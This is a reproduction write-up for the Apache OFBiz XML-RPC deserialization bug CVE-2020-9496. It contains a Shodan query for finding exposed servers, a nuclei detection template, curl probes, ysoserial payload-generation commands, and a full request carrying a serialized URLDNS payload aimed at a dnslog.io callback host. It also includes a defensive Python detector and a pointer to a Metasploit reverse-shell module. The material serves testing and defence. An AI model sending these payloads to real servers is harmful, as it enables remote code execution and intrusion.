
CVE-2020-9496: Reproducing the OFBiz Deserialization Vulnerability

Affected versions

  • versions earlier than 17.12.04

Asset fingerprint

  • Set-Cookie: OFBiz.Visitor

Searching for related assets with Shodan

shodan search --fields ip_str,port,org,hostnames OFBiz.Visitor

The actual results are not pasted here.

POC

cve-2020-9496

id: CVE-2020-9496

info:
  name: Apache OFBiz XML-RPC Java Deserialization
  author: dwisiswant0
  severity: medium

# This template detects a Java deserialization vulnerability in Apache
# OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
# versions prior to 17.12.04.
# --
# References:
# - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz

requests:
  - raw:
      - |
        POST /webtools/control/xmlrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "faultString"
          - "No such service [ProjectDiscovery]"
          - "methodResponse"
        condition: and
        part: body
      - type: word
        words:
          - "Content-Type: text/xml"
        part: header
      - type: status
        status:
          - 200

Method one

echo "https://localhost:8443" | nuclei -t cves/CVE-2020-9496.yaml

Method two

curl https://localhost:8443/webtools/control/xmlrpc -v -X POST -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'  -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>' -k -H 'Content-Type: application/xml'

Method three

java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 "touch /tmp/cve-2020-9496" | base64 | tr -d "\n"

java -jar ysoserial-master-SNAPSHOT.jar URLDNS "http://dnslog.io" | base64 | tr -d "\n"

POST /webtools/control/xmlrpc HTTP/1.1
Host: localhost:8443
Content-Type: application/xml
Content-Length: 4093

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>
curl http://localhost:8443/webtools/control/xmlrpc -X POST -v -d '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAEWcxNjFjLmwuZG5zbG9nLmlvdAAAcQB+AAV0AARodHRwcHh0ABhodHRwOi8vZzE2MWMubC5kbnNsb2cuaW94</serializable></value></member></struct></value></param></params></methodCall>' -k  -H 'Content-Type:application/xml'
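The request above shows what makes this bug distinguishable on the wire: the payload rides inside a `<serializable>` element from the XML-RPC extensions namespace, and the base64 text starts with `rO0AB`, the encoding of the Java serialization magic `0xACED0005`. The following script is an added example for the defensive side (it is not part of the original post and not OFBiz or nuclei code): it parses captured XML-RPC POST bodies, reports the method name, counts `<serializable>` elements, checks whether their content decodes to a Java serialization stream, and compares an OFBiz version string against the affected range stated above. The two request bodies embedded in it are constructed: a harmless probe identical in shape to the nuclei template's, and a request with a placeholder base64 blob whose first bytes are the Java stream magic.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

# Namespace of the Apache XML-RPC "extensions" feature; the vulnerable
# <serializable> element lives here (see the request in the post).
XMLRPC_EXT_NS = "http://ws.apache.org/xmlrpc/namespaces/extensions"
SERIALIZABLE_TAG = "{%s}serializable" % XMLRPC_EXT_NS

# Java serialized-object stream magic 0xACED; base64 of it begins "rO0A".
JAVA_STREAM_MAGIC = b"\xac\xed"

# First version that ships the fix, as stated in the post.
FIXED_VERSION = (17, 12, 4)

# Constructed sample bodies (not captured from any real system).
PROBE_BODY = (
    '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName>'
    '<params><param><value>dwisiswant0</value></param></params></methodCall>'
)
SERIALIZABLE_BODY = (
    '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName>'
    '<params><param><value><struct><member><name>test</name><value>'
    '<serializable xmlns="%s">rO0ABXNyUExBQ0VIT0xERVI=</serializable>'  # placeholder blob
    '</value></member></struct></value></param></params></methodCall>' % XMLRPC_EXT_NS
)


def looks_like_java_stream(b64_text: str) -> bool:
    """True if the base64 text decodes to bytes starting with 0xACED."""
    head = b64_text.strip()[:8]
    if len(head) < 4:
        return False
    try:
        # Decode only the first full base64 group(s); enough to see the magic.
        raw = base64.b64decode(head[: len(head) - len(head) % 4], validate=True)
    except (binascii.Error, ValueError):
        return False
    return raw.startswith(JAVA_STREAM_MAGIC)


def inspect_xmlrpc_body(body: str) -> dict:
    """Parse one XML-RPC request body and summarise what it carries."""
    result = {
        "method": None,
        "serializable_count": 0,
        "java_stream": False,
        "parse_error": False,
    }
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        result["parse_error"] = True
        return result
    if root.tag != "methodCall":
        return result
    name = root.find("methodName")
    if name is not None:
        result["method"] = (name.text or "").strip()
    # Walk every <serializable> element regardless of nesting depth.
    for el in root.iter(SERIALIZABLE_TAG):
        result["serializable_count"] += 1
        if looks_like_java_stream(el.text or ""):
            result["java_stream"] = True
    return result


def is_deserialization_attempt(body: str) -> bool:
    """Alert condition: any <serializable> extension element in the request."""
    return inspect_xmlrpc_body(body)["serializable_count"] > 0


def version_is_affected(version: str) -> bool:
    """Compare an OFBiz version such as '17.12.03' against the fixed release."""
    parts = tuple(int(p) for p in version.strip().split("."))
    return parts < FIXED_VERSION


if __name__ == "__main__":
    for label, body in (("probe", PROBE_BODY), ("serializable", SERIALIZABLE_BODY)):
        print(label, inspect_xmlrpc_body(body), "alert" if is_deserialization_attempt(body) else "ok")
    print("17.12.03 affected:", version_is_affected("17.12.03"))
```

The alert condition is deliberately the presence of the `<serializable>` element rather than the base64 prefix alone, because an attacker can pad or split the blob while the element itself cannot be avoided; the magic check is kept as a secondary signal that raises confidence. Run it over the bodies of POSTs to `/webtools/control/xmlrpc` taken from a reverse proxy or WAF log.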

Method four

Metasploit includes an exploit module for this vulnerability that returns a reverse shell.

References